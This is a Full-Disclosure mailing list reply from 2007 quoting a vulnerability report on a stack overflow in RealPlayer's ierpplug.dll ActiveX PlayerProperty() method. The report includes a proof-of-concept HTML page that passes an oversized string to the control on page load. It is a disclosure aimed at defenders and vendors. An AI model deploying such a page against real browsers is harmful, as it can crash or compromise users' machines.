Ouch! On Nov 26, 2007 9:15 PM, Elazar Broad <[EMAIL PROTECTED]> wrote:
> After some creative Googling, I am revising my original post. I believe > that the Import() method overflow that I originally posted is really > http://www.securityfocus.com/bid/26130, although I am not sure why Linux > is listed under the "Vulnerable" section, so I am taking it out of the PoC > code. Real claims to have patched this back in October, but I can still > throw a stack overflow exception via this function using the originally > stated version of RealPlayer(which I installed last night). I am now listing > this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control > PlayerProperty() Method Stack Overflow, and it might be wise to list this > under a separate BID. PoC as follows: > > ------------- > <!-- > written by e.b. > --> > <html> > <head> > <script language="JavaScript" DEFER> > function Check() { > var s = "AAAA"; > > while (s.length < 999999) s=s+s; > > var obj = new ActiveXObject("IERPCTL.IERPCTL"); > //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5} > > var obj2 = obj.PlayerProperty(s); > > > } > </script> > > </head> > <body onload="JavaScript: return Check();"> > > </body> > </html> > ------------- > > Elazar > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.goldwatches.com/coupons/ http://www.jewelerslounge.com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
